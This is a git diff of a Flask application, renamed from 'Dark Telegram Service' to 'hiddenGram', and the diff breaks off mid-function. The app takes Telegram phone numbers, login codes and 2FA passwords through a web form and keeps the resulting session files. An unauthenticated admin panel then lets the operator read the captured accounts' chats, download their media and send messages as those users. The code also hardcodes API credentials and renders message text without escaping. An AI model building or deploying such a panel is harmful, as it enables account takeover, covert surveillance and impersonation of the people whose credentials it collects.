Update app.py

app.py

@@ -3,23 +3,29 @@ import hashlib
 import os
 import sqlite3
 from pathlib import Path
+from datetime import datetime
 
 from flask import Flask, jsonify, request, render_template_string, send_from_directory, redirect, url_for
 from telethon.sync import TelegramClient
-from telethon.errors import SessionPasswordNeededError, FloodWaitError, UserNotParticipantError
+from telethon.errors import SessionPasswordNeededError, FloodWaitError, UserNotParticipantError, PeerFloodError
 from telethon.tl.functions.messages import ImportChatInviteRequest
 from telethon.tl.functions.channels import JoinChannelRequest
+from telethon.tl.types import User, Channel, Chat, MessageMediaPhoto, MessageMediaDocument, MessageMediaWebPage, MessageMediaUnsupported, MessageMediaPoll, MessageMediaGeo, MessageMediaContact
 
 app = Flask(__name__)
 
-API_ID = '22328650'
-API_HASH = '20b45c386598fab8028b1d99b63aeeeb'
+API_ID = '22328650' # Replace with your actual API ID
+API_HASH = '20b45c386598fab8028b1d99b63aeeeb' # Replace with your actual API Hash
 HOST = '0.0.0.0'
 PORT = 7860
 SESSION_DIR = 'sessions'
 DOWNLOAD_DIR = 'downloads'
 DB_PATH = 'users.db'
 
+# Ensure directories exist
+os.makedirs(SESSION_DIR, exist_ok=True)
+os.makedirs(DOWNLOAD_DIR, exist_ok=True)
+
 def init_db():
     with sqlite3.connect(DB_PATH) as conn:
         c = conn.cursor()
@@ -27,16 +33,17 @@ def init_db():
             id INTEGER PRIMARY KEY AUTOINCREMENT,
             telegram_id TEXT UNIQUE,
             username TEXT,
-            phone TEXT,
-            session_file TEXT,
+            phone TEXT NOT NULL UNIQUE,
+            session_file TEXT NOT NULL,
             created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
         )''')
         conn.commit()
 
-os.makedirs(SESSION_DIR, exist_ok=True)
-os.makedirs(DOWNLOAD_DIR, exist_ok=True)
-
 async def get_user_client(user_id):
+    """
+    Connects to a TelegramClient for the given user_id.
+    Ensures the client is connected before returning.
+    """
     with sqlite3.connect(DB_PATH) as conn:
         c = conn.cursor()
         c.execute('SELECT session_file FROM users WHERE id = ?', (user_id,))
@@ -44,126 +51,163 @@ async def get_user_client(user_id):
         if not result:
             return None, "User not found"
         session_file = result[0]
+    
     client = TelegramClient(session_file, API_ID, API_HASH)
-    await client.connect()
+    try:
+        await client.connect()
+        if not await client.is_user_authorized():
+            # If session is invalid, remove it from DB and return error
+            with sqlite3.connect(DB_PATH) as conn:
+                c = conn.cursor()
+                c.execute('DELETE FROM users WHERE id = ?', (user_id,))
+                conn.commit()
+            await client.disconnect()
+            return None, "Session expired or invalid. Please re-login."
+    except Exception as e:
+        if client.is_connected():
+            await client.disconnect()
+        return None, f"Failed to connect Telegram client: {e}"
+    
     return client, None
 
-HTML_TEMPLATE = '''
+# --- HTML Templates ---
+
+# Main login page for adding new accounts
+LOGIN_TEMPLATE = '''
 <!DOCTYPE html>
 <html lang="en">
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Dark Telegram Service</title>
+    <title>hiddenGram - Login</title>
     <style>
-        body { font-family: Arial, sans-serif; background: #1a1a1a; color: #fff; margin: 0; padding: 20px; }
-        .container { max-width: 900px; margin: auto; }
-        h1, h2 { text-align: center; color: #00ff00; }
-        .form, .admin-panel { background: #333; padding: 20px; border-radius: 5px; margin-bottom: 20px; }
-        input[type="text"], input[type="password"], textarea, button, select { padding: 10px; margin: 5px; background: #444; color: #fff; border: none; border-radius: 3px; }
-        button { cursor: pointer; background: #00ff00; }
-        button:hover { background: #00cc00; }
-        table { width: 100%; border-collapse: collapse; margin-top: 15px; }
-        th, td { padding: 10px; border: 1px solid #555; text-align: left; }
-        a { color: #00ff00; text-decoration: none; }
-        a:hover { text-decoration: underline; }
-        .chat-list, .message-list { background: #222; padding: 10px; max-height: 500px; overflow-y: auto; border-radius: 3px; margin-top: 15px;}
-        .chat-item, .message-item { margin: 10px 0; padding: 8px; background: #3a3a3a; border-radius: 3px; }
-        .message-item strong { color: #00ff00; }
-        .back-button { margin-top: 20px; display: block; text-align: center; }
-        .controls { display: flex; flex-wrap: wrap; justify-content: center; gap: 10px; margin-top: 15px;}
-        .controls button { flex: 1 1 auto; max-width: 200px; }
-        .split-panel { display: flex; gap: 20px; margin-top: 20px; }
-        .split-panel > div { flex: 1; background: #333; padding: 20px; border-radius: 5px; }
+        body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background: #2c2c2c; color: #e0e0e0; margin: 0; padding: 20px; display: flex; justify-content: center; align-items: center; min-height: 100vh; }
+        .container { background: #3a3a3a; padding: 30px; border-radius: 10px; box-shadow: 0 5px 15px rgba(0, 0, 0, 0.4); width: 100%; max-width: 450px; text-align: center; }
+        h1 { color: #87CEEB; margin-bottom: 25px; font-size: 2.2em; }
+        .form-group { margin-bottom: 15px; }
+        input[type="text"], input[type="password"] {
+            width: calc(100% - 20px); padding: 12px; margin: 8px 0; background: #4a4a4a; color: #e0e0e0; border: 1px solid #555; border-radius: 5px;
+            font-size: 1em; box-sizing: border-box;
+        }
+        button {
+            padding: 12px 25px; background: #87CEEB; color: #3a3a3a; border: none; border-radius: 5px; cursor: pointer;
+            font-size: 1.1em; font-weight: bold; transition: background 0.2s ease-in-out, transform 0.1s ease-in-out;
+            margin-top: 10px; width: calc(100% - 20px);
+        }
+        button:hover { background: #6aB1D1; transform: translateY(-1px); }
+        button:active { transform: translateY(1px); }
+        .message { margin-top: 15px; padding: 10px; border-radius: 5px; font-weight: bold; }
+        .message.success { background: #4CAF50; color: white; }
+        .message.error { background: #f44336; color: white; }
+        .admin-link { display: block; margin-top: 25px; font-size: 1.1em; }
+        .admin-link a { color: #87CEEB; text-decoration: none; transition: color 0.2s; }
+        .admin-link a:hover { color: #6aB1D1; text-decoration: underline; }
     </style>
 </head>
 <body>
     <div class="container">
-        <h1>Dark Telegram Service</h1>
-        <div class="form">
-            <h2>Login via Telegram</h2>
+        <h1>hiddenGram Login</h1>
+        <p style="color: #bbb;">Log in a new Telegram account for management.</p>
+        <div class="form-group">
             <input type="text" id="phone" placeholder="Phone number (+1234567890)">
             <button onclick="startLogin()">Start Login</button>
+        </div>
+        <div class="form-group">
             <input type="text" id="code" placeholder="Verification code" style="display:none;">
             <input type="text" id="password" placeholder="Cloud password" style="display:none;">
             <button id="submitCode" onclick="submitCode()" style="display:none;">Submit Code</button>
             <button id="submitPassword" onclick="submitPassword()" style="display:none;">Submit Password</button>
         </div>
-        <div class="admin-panel">
-            <h2>Admin Panel - Managed Accounts</h2>
-            <table>
-                <thead>
-                    <tr><th>ID</th><th>Username</th><th>Phone</th><th>Actions</th></tr>
-                </thead>
-                <tbody>
-                    {% for user in users %}
-                    <tr>
-                        <td>{{ user[0] }}</td>
-                        <td>{{ user[2] }}</td>
-                        <td>{{ user[3] }}</td>
-                        <td>
-                            <a href="/user/{{ user[0] }}/manage">Manage Account</a>
-                        </td>
-                    </tr>
-                    {% endfor %}
-                </tbody>
-            </table>
+        <div id="statusMessage" class="message" style="display:none;"></div>
+
+        <div class="admin-link">
+            <a href="/admin">Go to Admin Panel</a>
         </div>
     </div>
     <script>
         let phone = '';
         let phoneCodeHash = '';
+        const statusMessageDiv = document.getElementById('statusMessage');
+
+        function showMessage(message, type = 'success') {
+            statusMessageDiv.textContent = message;
+            statusMessageDiv.className = 'message ' + type;
+            statusMessageDiv.style.display = 'block';
+        }
 
         async function startLogin() {
             phone = document.getElementById('phone').value;
-            const response = await fetch('/login', {
+            if (!phone) {
+                showMessage('Please enter a phone number.', 'error');
+                return;
+            }
+            showMessage('Sending code...', 'info');
+            const response = await fetch('/api/login', {
                 method: 'POST',
                 headers: { 'Content-Type': 'application/json' },
                 body: JSON.stringify({ phone, step: 'start' })
             });
             const result = await response.json();
-            alert(result.message);
-            if (result.success && result.phone_code_hash) {
-                phoneCodeHash = result.phone_code_hash;
-                document.getElementById('code').style.display = 'inline';
-                document.getElementById('submitCode').style.display = 'inline';
-            } else if (result.success && !result.phone_code_hash) {
-                location.reload(); 
+            if (result.success) {
+                showMessage(result.message, 'success');
+                if (result.phone_code_hash) {
+                    phoneCodeHash = result.phone_code_hash;
+                    document.getElementById('code').style.display = 'inline';
+                    document.getElementById('submitCode').style.display = 'inline';
+                } else {
+                    // Already logged in, or immediate success (rare for new login)
+                    setTimeout(() => window.location.href = '/admin', 1000); // Redirect to admin panel
+                }
+            } else {
+                showMessage('Login failed: ' + result.message, 'error');
             }
         }
 
         async function submitCode() {
             const code = document.getElementById('code').value;
-            const response = await fetch('/login', {
+            if (!code) {
+                showMessage('Please enter the verification code.', 'error');
+                return;
+            }
+            showMessage('Submitting code...', 'info');
+            const response = await fetch('/api/login', {
                 method: 'POST',
                 headers: { 'Content-Type': 'application/json' },
                 body: JSON.stringify({ phone, code, phone_code_hash: phoneCodeHash, step: 'code' })
             });
             const result = await response.json();
-            alert(result.message);
             if (result.success) {
-                location.reload();
+                showMessage(result.message, 'success');
+                setTimeout(() => window.location.href = '/admin', 1000); // Redirect to admin panel
             } else if (result.password_required) {
+                showMessage(result.message, 'info');
                 document.getElementById('password').style.display = 'inline';
                 document.getElementById('submitPassword').style.display = 'inline';
                 document.getElementById('submitCode').style.display = 'none';
                 document.getElementById('code').style.display = 'none';
+            } else {
+                showMessage('Code submission failed: ' + result.message, 'error');
             }
         }
 
         async function submitPassword() {
             const password = document.getElementById('password').value;
-            const response = await fetch('/login', {
+            if (!password) {
+                showMessage('Please enter your cloud password.', 'error');
+                return;
+            }
+            showMessage('Submitting password...', 'info');
+            const response = await fetch('/api/login', {
                 method: 'POST',
                 headers: { 'Content-Type': 'application/json' },
                 body: JSON.stringify({ phone, password, step: 'password' })
             });
             const result = await response.json();
             if (result.success) {
-                alert(result.message);
-                location.reload();
+                showMessage(result.message, 'success');
+                setTimeout(() => window.location.href = '/admin', 1000); // Redirect to admin panel
             } else {
-                alert('Login failed: ' + result.message);
+                showMessage('Password submission failed: ' + result.message, 'error');
             }
         }
     </script>
@@ -171,182 +215,490 @@ HTML_TEMPLATE = '''
 </html>
 '''
 
-USER_MANAGE_TEMPLATE = '''
+# Admin panel to list managed accounts
+ADMIN_TEMPLATE = '''
 <!DOCTYPE html>
 <html lang="en">
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Manage Account - {{ user.username or user.phone }}</title>
+    <title>hiddenGram - Admin Panel</title>
     <style>
-        body { font-family: Arial, sans-serif; background: #1a1a1a; color: #fff; margin: 0; padding: 20px; }
-        .container { max-width: 900px; margin: auto; }
-        h1, h2 { text-align: center; color: #00ff00; }
-        .user-panel, .chat-list-panel, .action-panel { background: #333; padding: 20px; border-radius: 5px; margin-bottom: 20px; }
-        input[type="text"], textarea, button { padding: 10px; margin: 5px; background: #444; color: #fff; border: none; border-radius: 3px; width: calc(100% - 10px); box-sizing: border-box; }
-        button { cursor: pointer; background: #00ff00; width: auto; padding: 10px 20px; }
-        button:hover { background: #00cc00; }
-        .split-panel { display: flex; gap: 20px; margin-top: 20px; }
-        .split-panel > div { flex: 1; background: #333; padding: 20px; border-radius: 5px; }
-        .chat-list { max-height: 400px; overflow-y: auto; }
-        .chat-item { padding: 10px; border-bottom: 1px solid #444; cursor: pointer; }
-        .chat-item:hover { background: #4a4a4a; }
-        .chat-item:last-child { border-bottom: none; }
-        .chat-item a { display: block; color: #fff; text-decoration: none; }
-        .chat-item span { display: block; font-size: 0.9em; color: #bbb; }
-        .chat-item strong { color: #00ff00; }
-        .back-button { margin-top: 20px; text-align: center; }
-        .button-group { margin-top: 15px; display: flex; gap: 10px; flex-wrap: wrap; }
-        .button-group button { flex-grow: 1; }
+        body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background: #2c2c2c; color: #e0e0e0; margin: 0; padding: 20px; }
+        .container { max-width: 900px; margin: auto; background: #3a3a3a; padding: 30px; border-radius: 10px; box-shadow: 0 5px 15px rgba(0, 0, 0, 0.4); }
+        h1 { text-align: center; color: #87CEEB; margin-bottom: 25px; }
+        h2 { color: #e0e0e0; margin-top: 25px; margin-bottom: 15px; }
+        table { width: 100%; border-collapse: collapse; margin-top: 15px; }
+        th, td { padding: 12px; border: 1px solid #555; text-align: left; }
+        th { background: #4a4a4a; color: #87CEEB; }
+        tr:nth-child(even) { background-color: #3f3f3f; }
+        tr:hover { background-color: #555; }
+        a { color: #87CEEB; text-decoration: none; transition: color 0.2s; }
+        a:hover { text-decoration: underline; color: #6aB1D1; }
+        .home-link { display: block; text-align: center; margin-top: 30px; font-size: 1.1em; }
     </style>
 </head>
 <body>
     <div class="container">
-        <h1>Manage Account: {{ user.username or user.phone }} (ID: {{ user.id }})</h1>
+        <h1>hiddenGram - Admin Panel</h1>
+        <h2>Managed Accounts</h2>
+        <table>
+            <thead>
+                <tr><th>ID</th><th>Telegram ID</th><th>Username</th><th>Phone</th><th>Actions</th></tr>
+            </thead>
+            <tbody>
+                {% for user in users %}
+                <tr>
+                    <td>{{ user[0] }}</td>
+                    <td>{{ user[1] }}</td>
+                    <td>{{ user[2] or 'N/A' }}</td>
+                    <td>{{ user[3] }}</td>
+                    <td>
+                        <a href="/user/{{ user[0] }}/client">Manage/Open Client</a>
+                    </td>
+                </tr>
+                {% endfor %}
+            </tbody>
+        </table>
+        <div class="home-link">
+            <a href="/">Add New Account</a>
+        </div>
+    </div>
+</body>
+</html>
+'''
+
+# User client interface (hiddenGram client for a specific account)
+USER_CLIENT_TEMPLATE = '''
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>hiddenGram - {{ user.username or user.phone }}</title>
+    <style>
+        body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background: #2c2c2c; color: #e0e0e0; margin: 0; display: flex; height: 100vh; overflow: hidden; }
+        .chat-sidebar {
+            width: 300px; background: #3a3a3a; border-right: 1px solid #4a4a4a;
+            display: flex; flex-direction: column;
+        }
+        .sidebar-header { padding: 15px; border-bottom: 1px solid #4a4a4a; text-align: center; }
+        .sidebar-header h2 { color: #87CEEB; margin: 0; font-size: 1.5em; }
+        .chat-list { flex-grow: 1; overflow-y: auto; }
+        .chat-item { padding: 15px; border-bottom: 1px solid #444; cursor: pointer; display: flex; align-items: center; }
+        .chat-item:hover { background: #4a4a4a; }
+        .chat-item.active { background: #5a5a5a; }
+        .chat-avatar { width: 40px; height: 40px; border-radius: 50%; background: #6a6a6a; display: flex; justify-content: center; align-items: center; font-weight: bold; font-size: 1.2em; margin-right: 10px; }
+        .chat-info { flex-grow: 1; }
+        .chat-title { font-weight: bold; color: #e0e0e0; }
+        .chat-last-message { font-size: 0.9em; color: #bbb; overflow: hidden; white-space: nowrap; text-overflow: ellipsis; }
+
+        .chat-main { flex-grow: 1; display: flex; flex-direction: column; }
+        .chat-header { padding: 15px; background: #3a3a3a; border-bottom: 1px solid #4a4a4a; display: flex; justify-content: space-between; align-items: center; }
+        .chat-header h2 { margin: 0; color: #87CEEB; }
+        .chat-controls button {
+            padding: 8px 15px; background: #87CEEB; color: #3a3a3a; border: none; border-radius: 5px; cursor: pointer;
+            font-weight: bold; transition: background 0.2s; margin-left: 10px;
+        }
+        .chat-controls button:hover { background: #6aB1D1; }
 
-        <div class="split-panel">
-            <div class="action-panel">
-                <h2>Send Message</h2>
-                <input type="text" id="sendMessageRecipient" placeholder="Recipient (username or ID)">
-                <textarea id="sendMessageContent" rows="4" placeholder="Message content"></textarea>
-                <button onclick="sendMessage({{ user.id }})">Send Message</button>
+        .message-list-container { flex-grow: 1; overflow-y: auto; padding: 20px; background: #2c2c2c; }
+        .message-item {
+            display: flex; margin-bottom: 15px;
+            max-width: 80%; /* Limit message bubble width */
+        }
+        .message-item.me { justify-content: flex-end; margin-left: auto; } /* Align my messages to right */
+        .message-bubble {
+            background: #4a4a4a; padding: 12px 15px; border-radius: 18px; position: relative;
+            word-wrap: break-word; overflow-wrap: break-word; /* Ensure long words wrap */
+            max-width: 100%; /* Ensure bubble itself doesn't overflow */
+            min-width: 50px; /* Prevent very small bubbles for short messages */
+        }
+        .message-item.me .message-bubble { background: #87CEEB; color: #3a3a3a; } /* My message color */
 
-                <h2 style="margin-top: 30px;">Join Chat</h2>
-                <input type="text" id="joinChatIdentifier" placeholder="Channel/Group username or invite link">
-                <button onclick="joinChat({{ user.id }})">Join Chat</button>
+        .message-sender { font-size: 0.9em; font-weight: bold; margin-bottom: 5px; color: #bbbbbb; }
+        .message-item.me .message-sender { color: #5a5a5a; } /* Sender name for my message */
+
+        .message-time { font-size: 0.75em; color: #999; text-align: right; margin-top: 5px; }
+        .message-item.me .message-time { color: #5a5a5a; }
+
+        .media-link { display: block; margin-top: 5px; color: #00ffff; text-decoration: none; word-break: break-all; }
+        .media-link:hover { text-decoration: underline; }
+        .message-text { margin-bottom: 5px; }
+        .unsupported-media { color: #ffeb3b; font-style: italic; }
+
+        .message-input-area {
+            padding: 15px; border-top: 1px solid #4a4a4a; background: #3a3a3a;
+            display: flex;
+        }
+        .message-input {
+            flex-grow: 1; padding: 12px; background: #4a4a4a; color: #e0e0e0;
+            border: none; border-radius: 20px; outline: none; margin-right: 10px;
+            resize: none; /* Disable textarea resize handle */
+            font-size: 1em;
+            max-height: 120px; /* Limit height for auto-expanding textarea */
+            overflow-y: auto;
+        }
+        .message-input::placeholder { color: #999; }
+        .send-button {
+            padding: 12px 20px; background: #87CEEB; color: #3a3a3a; border: none;
+            border-radius: 20px; cursor: pointer; font-weight: bold; transition: background 0.2s;
+        }
+        .send-button:hover { background: #6aB1D1; }
+
+        /* Admin/Action Modals (simple overlay) */
+        .modal {
+            display: none; position: fixed; z-index: 1; left: 0; top: 0; width: 100%; height: 100%;
+            overflow: auto; background-color: rgba(0,0,0,0.7); justify-content: center; align-items: center;
+        }
+        .modal-content {
+            background-color: #3a3a3a; margin: auto; padding: 30px; border-radius: 10px;
+            width: 80%; max-width: 500px; text-align: center;
+        }
+        .modal-content h3 { color: #87CEEB; margin-bottom: 20px; }
+        .modal-content input[type="text"], .modal-content textarea { width: calc(100% - 20px); margin-bottom: 15px; }
+        .modal-content .button-group button { margin: 5px; padding: 10px 20px; border-radius: 5px; }
+        .close-button { color: #aaa; float: right; font-size: 28px; font-weight: bold; }
+        .close-button:hover, .close-button:focus { color: #e0e0e0; text-decoration: none; cursor: pointer; }
+    </style>
+</head>
+<body>
+    <div class="chat-sidebar">
+        <div class="sidebar-header">
+            <h2>hiddenGram</h2>
+            <div style="font-size: 0.9em; color: #bbb;">Logged in as: {{ user.username or user.phone }}</div>
+            <div style="margin-top: 10px;">
+                <button onclick="openJoinChatModal()">Join Chat</button>
+                <button onclick="openSendMessageModal()">New Message</button>
             </div>
+            <div style="margin-top: 10px;">
+                <a href="/admin" style="color: #6aB1D1; text-decoration: none;">Back to Admin</a>
+            </div>
+        </div>
+        <div class="chat-list" id="chatList">
+            <!-- Chats will be loaded here by JavaScript -->
+            <p style="text-align: center; padding: 20px; color: #bbb;">Loading chats...</p>
+        </div>
+    </div>
 
-            <div class="chat-list-panel">
-                <h2>Chats</h2>
-                <div class="chat-list">
-                    {% if chats %}
-                        {% for chat in chats %}
-                            <div class="chat-item">
-                                <a href="/user/{{ user.id }}/chat/{{ chat.id }}/messages">
-                                    <strong>{{ chat.title }}</strong>
-                                    <span>Type: {{ chat.type }} | Participants: {{ chat.participants }}</span>
-                                </a>
-                            </div>
-                        {% endfor %}
-                    {% else %}
-                        <p>No chats found.</p>
-                    {% endif %}
-                </div>
+    <div class="chat-main">
+        <div class="chat-header">
+            <h2 id="chatTitle">Select a chat</h2>
+            <div class="chat-controls">
+                <button onclick="loadMessages(currentChatId, true)" id="refreshMessagesBtn" style="display:none;">Refresh</button>
+            </div>
+        </div>
+        <div class="message-list-container" id="messageListContainer">
+            <!-- Messages will be loaded here by JavaScript -->
+            <p style="text-align: center; padding: 20px; color: #bbb;">No chat selected. Please select a chat from the left panel.</p>
+        </div>
+        <div class="message-input-area" id="messageInputArea" style="display:none;">
+            <textarea id="messageInput" class="message-input" placeholder="Type a message..."></textarea>
+            <button class="send-button" onclick="sendMessage()">Send</button>
+        </div>
+    </div>
+
+    <!-- Modals for Join Chat and New Message (Admin actions for this user) -->
+    <div id="joinChatModal" class="modal">
+        <div class="modal-content">
+            <span class="close-button" onclick="closeModal('joinChatModal')">×</span>
+            <h3>Join New Chat/Channel</h3>
+            <input type="text" id="joinChatIdentifier" placeholder="Channel/Group username or invite link">
+            <div class="button-group">
+                <button onclick="joinChat({{ user.id }})">Join Chat</button>
             </div>
+            <p id="joinChatStatus" style="color: #ffeb3b;"></p>
         </div>
+    </div>
 
-        <div class="back-button">
-            <a href="/">Back to Admin Panel</a>
+    <div id="sendMessageModal" class="modal">
+        <div class="modal-content">
+            <span class="close-button" onclick="closeModal('sendMessageModal')">×</span>
+            <h3>Send Message to Arbitrary Recipient</h3>
+            <input type="text" id="sendMessageRecipient" placeholder="Recipient (username or ID)">
+            <textarea id="sendMessageContent" rows="4" placeholder="Message content"></textarea>
+            <div class="button-group">
+                <button onclick="sendArbitraryMessage({{ user.id }})">Send Message</button>
+            </div>
+            <p id="sendMessageStatus" style="color: #ffeb3b;"></p>
         </div>
     </div>
 
     <script>
-        async function sendMessage(userId) {
-            const chatId = document.getElementById('sendMessageRecipient').value;
-            const message = document.getElementById('sendMessageContent').value;
-            if (chatId && message) {
-                const response = await fetch(`/send_message/${userId}`, {
+        const userId = {{ user.id }};
+        let currentChatId = null;
+        let currentChatTitle = '';
+
+        document.addEventListener('DOMContentLoaded', () => {
+            loadChatList();
+            document.getElementById('messageInput').addEventListener('keydown', function(event) {
+                if (event.key === 'Enter' && !event.shiftKey) {
+                    event.preventDefault(); // Prevent new line
+                    sendMessage();
+                }
+            });
+             document.getElementById('messageInput').addEventListener('input', function() {
+                this.style.height = 'auto';
+                this.style.height = (this.scrollHeight) + 'px';
+            });
+        });
+
+        async function loadChatList() {
+            const chatListDiv = document.getElementById('chatList');
+            chatListDiv.innerHTML = '<p style="text-align: center; padding: 20px; color: #bbb;">Loading chats...</p>';
+            try {
+                const response = await fetch(`/api/user/${userId}/chats`);
+                const result = await response.json();
+                if (result.success) {
+                    chatListDiv.innerHTML = '';
+                    if (result.chats.length === 0) {
+                        chatListDiv.innerHTML = '<p style="text-align: center; padding: 20px; color: #bbb;">No chats found. Join one!</p>';
+                    }
+                    result.chats.forEach(chat => {
+                        const chatItem = document.createElement('div');
+                        chatItem.className = 'chat-item';
+                        chatItem.setAttribute('data-chat-id', chat.id);
+                        chatItem.onclick = () => selectChat(chat.id, chat.title);
+
+                        const avatarInitial = chat.title ? chat.title.charAt(0).toUpperCase() : '?';
+                        chatItem.innerHTML = `
+                            <div class="chat-avatar">${avatarInitial}</div>
+                            <div class="chat-info">
+                                <div class="chat-title">${chat.title}</div>
+                                <div class="chat-last-message"><em>${chat.type}</em></div>
+                            </div>
+                        `;
+                        chatListDiv.appendChild(chatItem);
+                    });
+                } else {
+                    chatListDiv.innerHTML = `<p style="text-align: center; padding: 20px; color: #f44336;">Error: ${result.message}</p>`;
+                }
+            } catch (error) {
+                chatListDiv.innerHTML = `<p style="text-align: center; padding: 20px; color: #f44336;">Failed to load chats: ${error.message}</p>`;
+            }
+        }
+
+        function selectChat(chatId, chatTitle) {
+            currentChatId = chatId;
+            currentChatTitle = chatTitle;
+
+            document.getElementById('chatTitle').textContent = chatTitle;
+            document.getElementById('messageInputArea').style.display = 'flex';
+            document.getElementById('refreshMessagesBtn').style.display = 'inline-block';
+
+            // Remove active class from previous and add to current
+            document.querySelectorAll('.chat-item').forEach(item => {
+                item.classList.remove('active');
+            });
+            document.querySelector(`.chat-item[data-chat-id="${chatId}"]`).classList.add('active');
+
+            loadMessages(chatId);
+        }
+
+        async function loadMessages(chatId, forceRefresh = false) {
+            const messageListContainer = document.getElementById('messageListContainer');
+            messageListContainer.innerHTML = '<p style="text-align: center; padding: 20px; color: #bbb;">Loading messages...</p>';
+            try {
+                const response = await fetch(`/api/user/${userId}/chat/${chatId}/messages`);
+                const result = await response.json();
+                if (result.success) {
+                    messageListContainer.innerHTML = '';
+                    if (result.messages.length === 0) {
+                        messageListContainer.innerHTML = '<p style="text-align: center; padding: 20px; color: #bbb;">No messages found in this chat.</p>';
+                    }
+                    result.messages.forEach(msg => {
+                        const messageItem = document.createElement('div');
+                        messageItem.className = `message-item ${msg.is_outgoing ? 'me' : ''}`; // Add 'me' class if outgoing
+
+                        let mediaHtml = '';
+                        if (msg.file_name) {
+                            mediaHtml = `<a class="media-link" href="/download/${msg.file_name}" download>${msg.file_name} (${msg.file_size})</a>`;
+                        } else if (msg.unsupported_media) {
+                            mediaHtml = `<div class="unsupported-media"><em>(Unsupported media type)</em></div>`;
+                        } else if (msg.poll_question) {
+                            mediaHtml = `<div class="unsupported-media"><em>(Poll: ${msg.poll_question})</em></div>`;
+                        } else if (msg.geo_coords) {
+                            mediaHtml = `<div class="unsupported-media"><em>(Location: ${msg.geo_coords})</em></div>`;
+                        } else if (msg.contact_name) {
+                            mediaHtml = `<div class="unsupported-media"><em>(Contact: ${msg.contact_name})</em></div>`;
+                        } else if (msg.webpage_url) {
+                            mediaHtml = `<a class="media-link" href="${msg.webpage_url}" target="_blank">Web Page: ${msg.webpage_title || msg.webpage_url}</a>`;
+                        }
+
+                        messageItem.innerHTML = `
+                            <div class="message-bubble">
+                                <div class="message-sender">${msg.sender_name}</div>
+                                ${msg.text ? `<div class="message-text">${msg.text.replace(/\n/g, '<br>')}</div>` : ''}
+                                ${mediaHtml}
+                                <div class="message-time">${msg.date}</div>
+                            </div>
+                        `;
+                        messageListContainer.appendChild(messageItem);
+                    });
+                    // Scroll to bottom
+                    messageListContainer.scrollTop = messageListContainer.scrollHeight;
+                } else {
+                    messageListContainer.innerHTML = `<p style="text-align: center; padding: 20px; color: #f44336;">Error: ${result.message}</p>`;
+                }
+            } catch (error) {
+                messageListContainer.innerHTML = `<p style="text-align: center; padding: 20px; color: #f44336;">Failed to load messages: ${error.message}</p>`;
+            }
+        }
+
+        async function sendMessage() {
+            if (!currentChatId) {
+                alert('Please select a chat first.');
+                return;
+            }
+            const message = document.getElementById('messageInput').value.trim();
+            if (!message) {
+                return; // Don't send empty messages
+            }
+
+            // Temporarily add the message to UI
+            const messageListContainer = document.getElementById('messageListContainer');
+            const tempMessageItem = document.createElement('div');
+            tempMessageItem.className = 'message-item me';
+            tempMessageItem.innerHTML = `
+                <div class="message-bubble">
+                    <div class="message-sender">You</div>
+                    <div class="message-text">${message.replace(/\n/g, '<br>')}</div>
+                    <div class="message-time">Sending...</div>
+                </div>
+            `;
+            messageListContainer.appendChild(tempMessageItem);
+            messageListContainer.scrollTop = messageListContainer.scrollHeight;
+            document.getElementById('messageInput').value = ''; // Clear input
+
+            try {
+                const response = await fetch(`/api/user/${userId}/chat/${currentChatId}/send_message`, {
                     method: 'POST',
                     headers: { 'Content-Type': 'application/json' },
-                    body: JSON.stringify({ chat_id: chatId, message })
+                    body: JSON.stringify({ message })
                 });
                 const result = await response.json();
-                alert(result.message);
                 if (result.success) {
-                    document.getElementById('sendMessageRecipient').value = '';
-                    document.getElementById('sendMessageContent').value = '';
+                    tempMessageItem.querySelector('.message-time').textContent = 'Sent!';
+                } else {
+                    tempMessageItem.querySelector('.message-time').textContent = `Failed: ${result.message}`;
+                    tempMessageItem.querySelector('.message-bubble').style.backgroundColor = '#f44336';
                 }
-            } else {
-                alert('Please enter recipient and message.');
+            } catch (error) {
+                tempMessageItem.querySelector('.message-time').textContent = `Error: ${error.message}`;
+                tempMessageItem.querySelector('.message-bubble').style.backgroundColor = '#f44336';
+            } finally {
+                 setTimeout(() => loadMessages(currentChatId, true), 500); // Refresh after a short delay
             }
         }
 
+        // --- Modals related functions ---
+        function openModal(modalId) {
+            document.getElementById(modalId).style.display = 'flex';
+        }
+
+        function closeModal(modalId) {
+            document.getElementById(modalId).style.display = 'none';
+             // Clear status messages
+            document.getElementById('joinChatStatus').textContent = '';
+            document.getElementById('sendMessageStatus').textContent = '';
+        }
+
+        function openJoinChatModal() {
+            document.getElementById('joinChatIdentifier').value = '';
+            openModal('joinChatModal');
+        }
+
+        function openSendMessageModal() {
+            document.getElementById('sendMessageRecipient').value = '';
+            document.getElementById('sendMessageContent').value = '';
+            openModal('sendMessageModal');
+        }
+
         async function joinChat(userId) {
             const chatIdentifier = document.getElementById('joinChatIdentifier').value;
-            if (chatIdentifier) {
-                const response = await fetch(`/join_chat/${userId}`, {
+            const statusDiv = document.getElementById('joinChatStatus');
+            if (!chatIdentifier) {
+                statusDiv.textContent = 'Please enter channel/group username or invite link.';
+                return;
+            }
+            statusDiv.textContent = 'Joining chat...';
+            try {
+                const response = await fetch(`/api/user/${userId}/join_chat`, {
                     method: 'POST',
                     headers: { 'Content-Type': 'application/json' },
                     body: JSON.stringify({ chat_identifier: chatIdentifier })
                 });
                 const result = await response.json();
-                alert(result.message);
+                statusDiv.textContent = result.message;
                 if (result.success) {
                     document.getElementById('joinChatIdentifier').value = '';
-                    location.reload(); 
+                    setTimeout(() => {
+                        closeModal('joinChatModal');
+                        loadChatList(); // Refresh chat list
+                    }, 1500);
+                } else {
+                    statusDiv.style.color = '#f44336';
                 }
-            } else {
-                alert('Please enter channel/group username or invite link.');
+            } catch (error) {
+                statusDiv.textContent = `Error: ${error.message}`;
+                statusDiv.style.color = '#f44336';
+            }
+        }
+
+        async function sendArbitraryMessage(userId) {
+            const recipient = document.getElementById('sendMessageRecipient').value;
+            const content = document.getElementById('sendMessageContent').value;
+            const statusDiv = document.getElementById('sendMessageStatus');
+            if (!recipient || !content) {
